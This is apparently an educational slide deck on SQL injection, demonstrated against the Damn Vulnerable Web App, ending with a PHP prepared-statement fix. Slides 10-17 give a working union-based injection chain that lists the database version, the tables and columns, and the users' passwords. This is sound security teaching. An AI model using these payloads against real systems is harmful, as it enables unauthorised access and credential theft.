2. Topics
• What is SQL
• What is SQL Injection
• Damn Vulnerable Web App
• SQLI Demo
• Prepared Statements
3. What is SQL?
• The way you communicate with a database
• Structured Query Language
• Access and manipulate databases
• COSC 341 at IUP
4. What is SQL Injection?
• One of the most serious threats to web applications
• Injects SQL commands into an SQL statement via web page input
• Alters the SQL statement and compromises the security of the web application
• Common in PHP and ASP applications because of the prevalence of older functional (non-parameterized) database interfaces
• Occurs when
• Data enters a program from an untrusted source, and
• That data is used to dynamically construct an SQL query
• SQL Injection Harvesting
• Crafted SQL statements return sensitive data to the attacker
5. Types of SQLI
• Error Based
• Provokes a database error and gathers information from the error message
• Union Based
• Combines the results of two or more SELECT statements into one result set
• Blind
• Asks the database a true-or-false question and infers the answer from the application's response
7. Damn Vulnerable Web Site Demo
• PHP/MySQL web application
• Aid for security professionals
• Test skills and tools in a legal environment
• Help developers better understand the process of securing web applications
8. $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
9. Basic Injection
The web page is supposed to print the ID, first name, and surname.
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '1'";
10. Always True Scenario
• Asks the database to display every record, whether the first condition is false or the second is true
• %' – almost certainly not equal to any user_id, so the first condition is false
• '0'='0' – always true, because 0 always equals 0
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0'";
11. Display Database Version
• Notice the last displayed line
• This is the version of the MySQL database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, version() # ";
12. Display Database User
• Notice the last displayed line
• This is the name of the database user that executed the behind-the-scenes PHP code
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, user() # ";
13. Display Database Name
• Notice the last displayed line
• This is the name of the database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, database() # ";
14. Display All Tables in the information_schema
• Displays all the tables in the information_schema database
• INFORMATION_SCHEMA is the informational database
• It stores information about all the other databases that the MySQL server maintains
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, table_name from information_schema.tables #";
15. Display All User Tables in the information_schema
• Quicker than looking through the previous output and manually searching for the user table
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, table_name from information_schema.tables where table_name like 'user%' #";
• Displays all tables in the information_schema database whose names start with the prefix "user"
16. Display all Column fields in the User Table
• Displays all the columns in the users table
• Notice the user_id, first_name, last_name, user and password columns
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #";
17. Display Column Field Contents in the User Table
• Successfully displays all the authentication information stored in the database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #";
18. Prepared Statements and Bound Parameters
• The query text and the data are sent to the SQL server separately
• Also called parameterized statements or parameterized SQL
• A template for an SQL statement
• Values are plugged into the query after the query has been "prepared" and is ready to be executed
• (?), Bound Parameters
• Placeholders in the template where the actual values are plugged in; the server treats a bound value as data only, never as part of the SQL syntax
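The following is an added example, not DVWA's own code: the $getid lookup from the demo slides rewritten as a mysqli prepared statement, shown next to the concatenated form from slide 8 for contrast. The hostname, database name and credentials are placeholders, and the table and column names are the ones the slides use.

```php
<?php
// Added example (not DVWA's code): the slide's $getid lookup done safely with
// a mysqli prepared statement. Connection details below are placeholders.
declare(strict_types=1);

mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // throw on DB errors
$db = new mysqli('localhost', 'dvwa_user', 'PLACEHOLDER_PASSWORD', 'dvwa');

// Vulnerable form from the slides: $id is spliced into the query text, so input
// such as  %' or '0'='0  becomes part of the SQL statement itself.
function lookup_user_vulnerable(mysqli $db, string $id): array
{
    $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
    return $db->query($getid)->fetch_all(MYSQLI_ASSOC);
}

// Hardened form: the statement template (with a ? placeholder) is sent to the
// server first; the value is bound afterwards and is always handled as a single
// string for user_id, so quotes, "or", "union" or "#" inside it have no effect.
function lookup_user_prepared(mysqli $db, string $id): array
{
    $stmt = $db->prepare('SELECT first_name, last_name FROM users WHERE user_id = ?');
    $stmt->bind_param('s', $id);   // 's': bind the value as a string
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}

$input = $_GET['id'] ?? '';
foreach (lookup_user_prepared($db, $input) as $row) {
    // Output encoding is a separate issue from SQL injection but still required
    // before echoing database content or user input into HTML.
    printf("ID: %s<br>First name: %s<br>Surname: %s<br>\n",
        htmlspecialchars($input, ENT_QUOTES, 'UTF-8'),
        htmlspecialchars($row['first_name'], ENT_QUOTES, 'UTF-8'),
        htmlspecialchars($row['last_name'], ENT_QUOTES, 'UTF-8'));
}
```

With the prepared version, submitting the slide-10 input returns no rows, because the server looks for a user_id literally equal to the whole string rather than evaluating it as SQL. If user_id is an integer column, validating the input as an integer and binding it with 'i' instead of 's' is tighter still. mysqli_stmt::get_result() requires the mysqlnd driver, which is the default in current PHP builds; PDO::prepare with bindValue() gives the same protection if you prefer that API.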